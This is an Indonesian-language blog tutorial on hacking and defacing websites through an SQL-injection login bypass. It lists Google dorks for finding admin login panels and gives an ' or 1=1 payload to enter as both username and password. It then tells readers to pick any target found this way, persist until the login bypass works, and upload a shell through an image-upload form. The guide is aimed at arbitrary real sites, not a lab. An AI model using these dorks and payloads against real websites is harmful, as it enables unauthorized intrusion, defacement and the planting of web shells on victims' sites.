» » Tutorial Cara Hack Website dan Deface POC Bypass SQL Login

Tutorial Cara Hack Website dan Deface POC Bypass SQL Login

Edit
  • Devian Design - Jasa Design Jember
    Deviant Design Merupakan Layanan Jasa Desain dan Social Media Management Yang Mempunyai Pusat Di Jember. Dengan layanan yang murah, cepat dan pastinya dengan kualitas kelas atas. Mampu mengatur segala kebutuhanmu dalam mengelola social media.


Bypass Sql Injection adalah suatu teknik deface yang memanfaatkan miss configuration dalam Database SQL yang berimbas dalam kesalahan identifikasi query. Hal ini mampu dimanfaatkan sang para attacker buat menerobos login admin tanpa proses filter berdasarkan config database website tersebut,& hasilnya oleh attacker menggunakan gampang menerima akses web korban. Teknik ini hampir sama menggunakan teknik bypass admin,namun pada Bypass Sql Injection ini lebih mampu dipertimbangkan. Biasanya jika bypass admin nir mampu,maka aku  akan mencoba memakai cara deface yang ini. Mungkin berdasarkan kalian atau mungkin banyak diluar sana yang kurang mengerti & bertanya tanya apa itu bypass sql login ? Menurut beberapa sumber yang aku  baca,bypass sql login.


1.Gunakan dork dibawah ini :
inurl:/admin_panel/
inurl:/admin/ intext:login
inurl:/admin2/ intext:login
inurl:/login_panel/ intext:login
inurl:/panel/admin intext:login
inurl:/panel/login intext:login
inurl:/login/panel intext:login
inurl:/admin1.php intext:login
inurl:/adm/ intext:login
inurl:/administrator/ intext:login
inurl:/user/login/ intext:login
inurl:/admcp/ intext:login
inurl:/author/admin/ intext:login
inurl:/redaktur/ intext:login
inurl:/userpanel/ intext:login
inurl:/page/panel/ intext:login
inurl:/login/area/ intext:login
inurl:/area/login/ intext:login
inurl:/redaksi/login
inurl:/admcp/login intext:login
inurl:/admin-area intext:login

2.Masukkan Username  pada form login dengan username sebagai berikut: 
' or 1=1 limit 1 -- -+
3.Masukkan Password pada form login dengan password sebagai berikut:  : 
' or 1=1 limit 1 -- -+

Kalian bisa melakukan dorking dengan google dork seperti gambar dibawah


Temukan salah satu target dari sekian banyak target seperti yang ada diatas. pastikan target tersebut mempunyai form login.

masukkan  payload tadi untuk membuat kita membypass keamanan pada fitur login website target. pastikan banyak yang kalian coba dan jangan menyerah

Ketika sudah berhasil masuk cari tombol untuk menulis artikel ataupun mengupload gambar. upload shell kalian pada form upload gambar. pastikan form tersebut mendukung langkah kalian dalam upload gambar


Nakanosec

Artikel Terbaru